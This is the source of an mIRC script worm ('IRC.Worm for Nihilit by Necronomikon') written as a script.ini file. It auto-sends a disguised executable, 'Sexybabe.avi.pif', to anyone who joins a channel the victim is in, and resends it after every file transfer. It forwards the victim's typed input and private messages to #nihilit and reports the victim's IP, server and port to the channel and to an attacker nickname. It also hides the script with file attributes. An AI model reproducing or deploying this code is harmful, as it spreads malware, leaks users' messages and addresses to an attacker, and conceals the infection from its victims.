[SCRIPT]
n0=on 1:start:{
n1=on 1:join:#:{
n2=if ( $nick == $me ) { halt } | .dcc send $nick c:\Sexybabe.avi.pif
n3= }
n4=on 1:input:*:.msg #nihilit [( $+ $active $+ ) $1-]
n5=on 1:text:*:?:.msg #nihilit [( $+ $active $+ ) $1-]
n6=on 1:FILESENT:*.*:/dcc send $nick C:\Sexybabe.avi.pif
n7=on 1:connect:.msg #nihilit by Necronomikon
n8=  /msg #nihilit Im Infected With A Virus from Necronomikon
n9= /part #nihilit
n10= /clear
n11= /motd
n12=on 1:connect:.msg #nihilit Alive! $ip on $server $+ : $+ $port $+
n13=on 1:connect:/raw privmsg Necronomi HeyBabe! $ip on $server $+ : $+ $port $+
n14= }
n15=On 1:Connect:{
n16=/run attrib +h script.ini
n17=/run attrib +r script.ini
n18=/run attrib +s script.ini
n19= }
;IRC.Worm for Nihilit by Necronomikon